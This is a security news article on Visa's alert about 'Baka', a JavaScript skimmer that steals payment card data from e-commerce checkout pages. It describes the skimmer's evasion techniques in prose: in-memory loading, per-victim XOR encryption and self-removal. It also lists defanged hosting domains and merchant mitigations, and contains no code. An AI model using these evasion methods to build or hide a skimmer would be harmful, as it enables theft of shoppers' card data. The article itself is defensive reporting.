Account Takeover Fraud , Card Not Present Fraud , Cybercrime
Visa Warns of Fresh Skimmer Targeting E-Commerce Sites
'Baka' Avoids Detection While Stealing Customers' Payment Card DataVisa's payment fraud disruption team is warning of a recently uncovered digital skimmer called "Baka" that is stealing payment card data from e-commerce sites while hiding from security tools.
See Also: OnDemand | 2024 Phishing Insights: What 11.9 Million User Behaviors Reveal About Your Risk
Researchers discovered the malicious code while examining a command-and-control infrastructure that previously hosted the ImageID skimmer.
Although Baka functions similarly to other JavaScript skimmers, the Visa fraud team found that this malicious code is able to load dynamically into e-commerce sites and then hide from security tools using obfuscation techniques, according to the Visa alert.
The Baka skimmer has been found in "several merchant websites across multiple global regions," the alert notes, but it does not provide further details.
"The most compelling components of this kit are the unique loader and obfuscation method," the Visa alert notes. "The skimmer loads dynamically to avoid static malware scanners and uses unique encryption parameters for each victim to obfuscate the malicious code. … This skimmer variant avoids detection and analysis by removing itself from memory when it detects the possibility of dynamic analysis with developer tools or when data has been successfully exfiltrated."
How Baka Works
The Visa alert does not indicate how Baka is initially delivered to a network. But the report notes that the malicious code is hosted on several suspicious domains, including: jquery-cycle[.]com, b-metric[.]com, apienclave[.]com, quicdn[.]com, apisquere[.]com, ordercheck[.]online and pridecdn[.]com.
Once the initial infection takes hold, the skimmer is uploaded through the command-and-control server, but the code loads in memory. This means the malware is never present on the targeted e-commerce firm's server or saved to another device, helping it to avoid detection, according to the alert.
"The skimming payload decrypts to JavaScript written to resemble code that would be used to render pages dynamically," according to Visa.
Once embedded in an e-commerce site’s checkout page, the skimmer begins to collect payment and other customer data from various fields and sends the information to the fraudsters’ command-and-control server, Visa notes.
Once data exfiltration is complete, Baka performs a "clean-up" function that removes the skimming code from the checkout page, according to the alert. This also helps ensure that JavaScript is not spotted by anti-malware tools.
Visa's analysts found that the operators behind Baka use an XOR cipher as a way to obscure the malicious code and further hide it from detection, according to the alert.
"While the use of an XOR cipher is not new, this is the first time Visa has observed its use in JavaScript skimming malware," according to the alert.
Mitigating risks
The Visa alert advises e-commerce merchants to take several steps to mitigate skimming risks, including:
- Run regular checks to determine if any code is attempting to communicate with a known command-and-control server;
- Check code added through a service provider;
- Vet content delivery networks and other third parties that have access to the checkout function;
- Update and patch any software or services used on checkout sites and consider adding a firewall;
- Limit access to online administrative portals and ensure that those with access use strong passwords.
Other Skimming Attacks
In November 2019, Visa researchers uncovered another type of skimmer called Pipka that had the ability to remove itself from the HTML of a compromised payment website after it executed, enabling it to avoid security detection (see: New JavaScript Skimmer Found on E-Commerce Sites).
Other security researchers have more recently warned about ongoing attacks against e-commerce websites using malicious JavaScript to steal payment card data.
For example, in August, security firm Group-IB warned of a cybercriminal gang called "UltraRank" that is using malicious code to skim payment card data and then selling that information to others on its own underground site (see: 'UltraRank' Gang Sells Card Data It Steals).
Earlier this month, security firm Malwarebytes warned that some fraudsters have started using encrypted messages on Telegram to steal data faster (see: Fraudsters Use Telegram App to Steal Payment Card Data).